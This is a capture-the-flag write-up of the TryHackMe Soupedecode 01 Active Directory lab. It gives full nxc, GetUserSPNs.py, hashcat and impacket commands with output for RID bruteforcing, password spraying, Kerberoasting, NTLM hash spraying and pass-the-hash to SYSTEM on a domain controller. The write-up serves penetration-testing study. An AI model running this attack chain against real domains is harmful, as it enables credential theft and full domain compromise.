Post

TryHackMe: Soupedecode 01

TryHackMe: Soupedecode 01

Soupedecode 01 was a very simple Active Directory room. We began by enumerating a list of usernames via RID bruteforce and subsequently found valid credentials through password spraying. After that, using a Kerberoasting attack yielded credentials for a service account, granting access to an SMB share containing usernames and NTLM hashes. Finally, by spraying the hashes, we discovered the credentials of an administrator account on the Domain Controller (DC) and completed the room.

Tryhackme Room Link

Initial Enumeration

Nmap Scan

As usual, we start with a port scan.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
$ nmap -T4 -n -sC -sV -Pn -p- 10.10.67.33
...
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-08-01 19:46:54Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2025-08-01T19:48:24+00:00; +3s from scanner time.
| ssl-cert: Subject: commonName=DC01.SOUPEDECODE.LOCAL
...
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

From the port scan, it seems we are dealing with a Domain Controller. We also learn the hostname and domain name, so we add them to our /etc/hosts file:

1
10.10.67.33 DC01.SOUPEDECODE.LOCAL SOUPEDECODE.LOCAL

Enumerating SMB Shares

Using nxc (netexec), we enumerate SMB shares and find that logging in as the guest user is permitted and grants us read access to the IPC$ share.

1
2
3
4
5
6
7
8
9
10
11
12
13
$ nxc smb dc01.soupedecode.local -u 'guest' -p '' --shares
SMB         10.10.67.33     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.67.33     445    DC01             [+] SOUPEDECODE.LOCAL\guest:
SMB         10.10.67.33     445    DC01             [*] Enumerated shares
SMB         10.10.67.33     445    DC01             Share           Permissions     Remark
SMB         10.10.67.33     445    DC01             -----           -----------     ------
SMB         10.10.67.33     445    DC01             ADMIN$                          Remote Admin
SMB         10.10.67.33     445    DC01             backup
SMB         10.10.67.33     445    DC01             C$                              Default share
SMB         10.10.67.33     445    DC01             IPC$            READ            Remote IPC
SMB         10.10.67.33     445    DC01             NETLOGON                        Logon server share
SMB         10.10.67.33     445    DC01             SYSVOL                          Logon server share
SMB         10.10.67.33     445    DC01             Users

Discovering Usernames

Leveraging our access to the IPC$ share, we can perform a RID bruteforce attack using nxc to enumerate domain users.

1
2
3
4
5
6
7
8
9
10
11
$ nxc smb dc01.soupedecode.local -u 'guest' -p '' --rid-brute 3000
SMB         10.10.67.33     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.67.33     445    DC01             [+] SOUPEDECODE.LOCAL\guest:
SMB         10.10.67.33     445    DC01             498: SOUPEDECODE\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.67.33     445    DC01             500: SOUPEDECODE\Administrator (SidTypeUser)
...
SMB         10.10.67.33     445    DC01             1000: SOUPEDECODE\DC01$ (SidTypeUser)
SMB         10.10.67.33     445    DC01             1101: SOUPEDECODE\DnsAdmins (SidTypeAlias)
SMB         10.10.67.33     445    DC01             1102: SOUPEDECODE\DnsUpdateProxy (SidTypeGroup)
SMB         10.10.67.33     445    DC01             1103: SOUPEDECODE\bmark0 (SidTypeUser)
...

We can also filter the output to create a clean list of usernames and save it to valid_usernames.txt.

1
$ nxc smb dc01.soupedecode.local -u 'guest' -p '' --rid-brute 3000 | grep SidTypeUser | cut -d '\' -f 2 | cut -d ' ' -f 1 > valid_usernames.txt

User Flag

Password Spraying

With the list of valid usernames, we can attempt ASREPRoasting, but no accounts are vulnerable. Also, trying standard password spraying attempts with common passwords (e.g., the domain name, seasons, years) are also unsuccessful. However, another common weak password choice is for a user to set their password to their username. By attempting to authenticate each user with their own username as the password, we successfully identify valid credentials for the user ybob317.

1
2
3
4
5
6
7
8
9
10
$ nxc smb dc01.soupedecode.local -u valid_usernames.txt -p valid_usernames.txt --no-bruteforce --continue-on-success
SMB         10.10.67.33     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.67.33     445    DC01             [-] SOUPEDECODE.LOCAL\Administrator:Administrator STATUS_LOGON_FAILURE
SMB         10.10.67.33     445    DC01             [-] SOUPEDECODE.LOCAL\Guest:Guest STATUS_LOGON_FAILURE
SMB         10.10.67.33     445    DC01             [-] SOUPEDECODE.LOCAL\krbtgt:krbtgt STATUS_LOGON_FAILURE
SMB         10.10.67.33     445    DC01             [-] SOUPEDECODE.LOCAL\DC01$:DC01$ STATUS_LOGON_FAILURE
SMB         10.10.67.33     445    DC01             [-] SOUPEDECODE.LOCAL\bmark0:bmark0 STATUS_LOGON_FAILURE
...
SMB         10.10.67.33     445    DC01             [+] SOUPEDECODE.LOCAL\ybob317:ybob317
...

As the ybob317 user, we have read access to the Users share, which we can connect to using smbclient.py and retrieve the user flag from \\dc01.soupedecode.local\Users\ybob317\Desktop\user.txt.

1
2
3
4
5
6
7
8
9
10
11
12
13
$ nxc smb dc01.soupedecode.local -u 'ybob317' -p 'ybob317' --shares
SMB         10.10.67.33     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.67.33     445    DC01             [+] SOUPEDECODE.LOCAL\ybob317:ybob317
SMB         10.10.67.33     445    DC01             [*] Enumerated shares
SMB         10.10.67.33     445    DC01             Share           Permissions     Remark
SMB         10.10.67.33     445    DC01             -----           -----------     ------
SMB         10.10.67.33     445    DC01             ADMIN$                          Remote Admin
SMB         10.10.67.33     445    DC01             backup
SMB         10.10.67.33     445    DC01             C$                              Default share
SMB         10.10.67.33     445    DC01             IPC$            READ            Remote IPC
SMB         10.10.67.33     445    DC01             NETLOGON        READ            Logon server share
SMB         10.10.67.33     445    DC01             SYSVOL          READ            Logon server share
SMB         10.10.67.33     445    DC01             Users           READ
1
2
3
4
5
6
7
8
9
10
$ smbclient.py 'SOUPEDECODE.LOCAL/ybob317:ybob317@dc01.soupedecode.local'

# use Users
# cd ybob317/Desktop
# ls
drw-rw-rw-          0  Fri Jul 25 17:51:44 2025 .
drw-rw-rw-          0  Mon Jun 17 17:24:32 2024 ..
-rw-rw-rw-        282  Mon Jun 17 17:24:32 2024 desktop.ini
-rw-rw-rw-         33  Fri Jul 25 17:51:44 2025 user.txt
# get user.txt

Root Flag

Kerberoasting

With valid domain credentials, we check for Kerberoastable accounts using GetUserSPNs.py:

1
2
3
4
5
6
7
8
9
$ GetUserSPNs.py -request -outputfile kerberoastables.txt 'SOUPEDECODE.LOCAL/ybob317:ybob317'

ServicePrincipalName    Name            MemberOf  PasswordLastSet             LastLogon  Delegation
----------------------  --------------  --------  --------------------------  ---------  ----------
FTP/FileServer          file_svc                  2024-06-17 17:32:23.726085  <never>
FW/ProxyServer          firewall_svc              2024-06-17 17:28:32.710125  <never>
HTTP/BackupServer       backup_svc                2024-06-17 17:28:49.476511  <never>
HTTP/WebServer          web_svc                   2024-06-17 17:29:04.569417  <never>
HTTPS/MonitoringServer  monitoring_svc            2024-06-17 17:29:18.511871  <never>

Now, using either hashcat or john, we attempt to crack the hashes with the rockyou.txt wordlist and successfully discover the password for the file_svc account.

1
2
3
4
$ hashcat kerberoastables.txt /usr/share/wordlists/rockyou.txt

$ hashcat kerberoastables.txt --show
$krb5tgs$23$*file_svc$SOUPEDECODE.LOCAL$SOUPEDECODE.LOCAL/file_svc*$d66d...73b6:Pa[REDACTED]!!

Accessing the Backup Share

With the file_svc account, we re-enumerate SMB shares and discover that we now have read access to the backup share.

1
2
3
4
5
6
7
8
9
10
11
12
13
$ nxc smb dc01.soupedecode.local -u 'file_svc' -p 'Pa[REDACTED]!!' --shares
SMB         10.10.67.33     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.67.33     445    DC01             [+] SOUPEDECODE.LOCAL\file_svc:Pa[REDACTED]!!
SMB         10.10.67.33     445    DC01             [*] Enumerated shares
SMB         10.10.67.33     445    DC01             Share           Permissions     Remark
SMB         10.10.67.33     445    DC01             -----           -----------     ------
SMB         10.10.67.33     445    DC01             ADMIN$                          Remote Admin
SMB         10.10.67.33     445    DC01             backup          READ
SMB         10.10.67.33     445    DC01             C$                              Default share
SMB         10.10.67.33     445    DC01             IPC$            READ            Remote IPC
SMB         10.10.67.33     445    DC01             NETLOGON        READ            Logon server share
SMB         10.10.67.33     445    DC01             SYSVOL          READ            Logon server share
SMB         10.10.67.33     445    DC01             Users

Checking the share, we find a single text file named backup_extract.txt inside:

1
2
3
4
5
6
7
8
$ smbclient.py 'SOUPEDECODE.LOCAL/file_svc:Pa[REDACTED]!!@dc01.soupedecode.local'

# use backup
# ls
drw-rw-rw-          0  Mon Jun 17 17:41:17 2024 .
drw-rw-rw-          0  Fri Jul 25 17:51:20 2025 ..
-rw-rw-rw-        892  Mon Jun 17 17:41:23 2024 backup_extract.txt
# get backup_extract.txt

The file contains a list of account names and their corresponding NTLM hashes.

1
2
3
4
5
6
7
8
9
10
11
$ cat backup_extract.txt
WebServer$:2119:aad3b435b51404eeaad3b435b51404ee:c47b45f5d4df5a494bd19f13e14f7902:::
DatabaseServer$:2120:aad3b435b51404eeaad3b435b51404ee:406b424c7b483a42458bf6f545c936f7:::
CitrixServer$:2122:aad3b435b51404eeaad3b435b51404ee:48fc7eca9af236d7849273990f6c5117:::
FileServer$:2065:aad3b435b51404eeaad3b435b51404ee:e41d[REDACTED]5559:::
MailServer$:2124:aad3b435b51404eeaad3b435b51404ee:46a4655f18def136b3bfab7b0b4e70e3:::
BackupServer$:2125:aad3b435b51404eeaad3b435b51404ee:46a4655f18def136b3bfab7b0b4e70e3:::
ApplicationServer$:2126:aad3b435b51404eeaad3b435b51404ee:8cd90ac6cba6dde9d8038b068c17e9f5:::
PrintServer$:2127:aad3b435b51404eeaad3b435b51404ee:b8a38c432ac59ed00b2a373f4f050d28:::
ProxyServer$:2128:aad3b435b51404eeaad3b435b51404ee:4e3f0bb3e5b6e3e662611b1a87988881:::
MonitoringServer$:2129:aad3b435b51404eeaad3b435b51404ee:48fc7eca9af236d7849273990f6c5117:::

Hash Spraying

We parse the file to create separate lists for usernames and NTLM hashes.

1
2
$ cat backup_extract.txt | cut -d ':' -f 1 > backup_extract_users.txt
$ cat backup_extract.txt | cut -d ':' -f 4 > backup_extract_hashes.txt

Now, spraying the hashes using nxc with the list of usernames and their corresponding hashes, we discover that the hash for the FileServer$ account is valid and grants us access.

1
2
3
4
5
$ nxc smb dc01.soupedecode.local -u backup_extract_users.txt -H backup_extract_hashes.txt --no-bruteforce --continue-on-success
SMB         10.10.67.33     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
...
SMB         10.10.67.33     445    DC01             [+] SOUPEDECODE.LOCAL\FileServer$:e41d[REDACTED]5559 (Pwn3d!)
...

Administrator Access

Also, the (Pwn3d!) tag in the nxc output indicates that the FileServer$ account has administrative privileges on the target, allowing us to use an impacket script like smbexec.py to execute commands on the DC and read the root flag at C:\Users\Administrator\Desktop\root.txt to complete the room.

1
2
3
4
5
6
7
$ smbexec.py -hashes :e41d[REDACTED]5559 'SOUPEDECODE.LOCAL/FileServer$@dc01.soupedecode.local'

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt
27[REDACTED]6a

Alternatively, we could just retrieve the flag via SMB:

1
2
3
4
5
6
7
8
9
10
$ smbclient.py -hashes :e41d[REDACTED]5559 'SOUPEDECODE.LOCAL/FileServer$@dc01.soupedecode.local'

# use C$
# cd Users/Administrator/Desktop
# ls
drw-rw-rw-          0  Fri Jul 25 17:51:20 2025 .
drw-rw-rw-          0  Fri Aug  1 19:40:46 2025 ..
drw-rw-rw-          0  Mon Jun 17 17:41:17 2024 backup
-rw-rw-rw-        282  Sat Jun 15 17:54:32 2024 desktop.ini
-rw-rw-rw-         33  Fri Jul 25 17:51:20 2025 root.txt

Lastly, a quick check of the FileServer$ account’s group memberships shows it belongs to the Enterprise Admins group, explaining our administrative access.

1
2
C:\Windows\system32>powershell -c (Get-ADComputer "FileServer$" -Properties MemberOf).MemberOf
CN=Enterprise Admins,CN=Users,DC=SOUPEDECODE,DC=LOCAL
This post is licensed under CC BY 4.0 by the author.